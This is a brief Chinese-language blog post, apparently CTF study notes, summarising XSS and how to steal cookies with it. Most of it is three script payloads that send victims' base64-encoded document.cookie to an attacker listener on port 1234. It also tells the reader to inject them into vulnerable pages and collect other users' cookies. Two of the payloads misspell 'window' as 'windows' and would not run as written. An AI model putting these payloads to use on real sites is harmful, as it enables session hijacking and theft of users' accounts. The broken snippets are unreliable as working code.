Posted Updated a minute read (About 190 words)

跨站脚本攻击

xss打cookie姿势总结

xss攻击是客户端攻击

xss是什么

将任意javascript代码插入到其他web用户页面执行以达到攻击目的
当用户里浏览改页时,恶意代码将会被执行,用户的信息等将被窃取。

容易产生xss的地方

1.数据交互的地方:get、post、cookies、headers
2数据输出的地方:

ctf中的xss

<script>windows('http://127.0.0.1:1234?q='+btoa(document.cookie))</script>
<script>windows.location.href='http://127.0.0.1:1234?q='+btoa(document.cookie)</script>
<script>
var img=document.createElement('img');
img.src='http://127.0.0.1:1234/?q='+btoa(document.cookie);
document.body.append(img)
</script>

将以上内容插入含有xss漏洞的页面中,其他用户访问这些页面,你在本地监听1234端口,即可获得他们的一些cookie信息

跨站脚本攻击

http://example.com/2021/09/18/跨站脚本攻击/

Author

vague huang

Posted on

2021-09-18

Updated on

2021-09-18

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×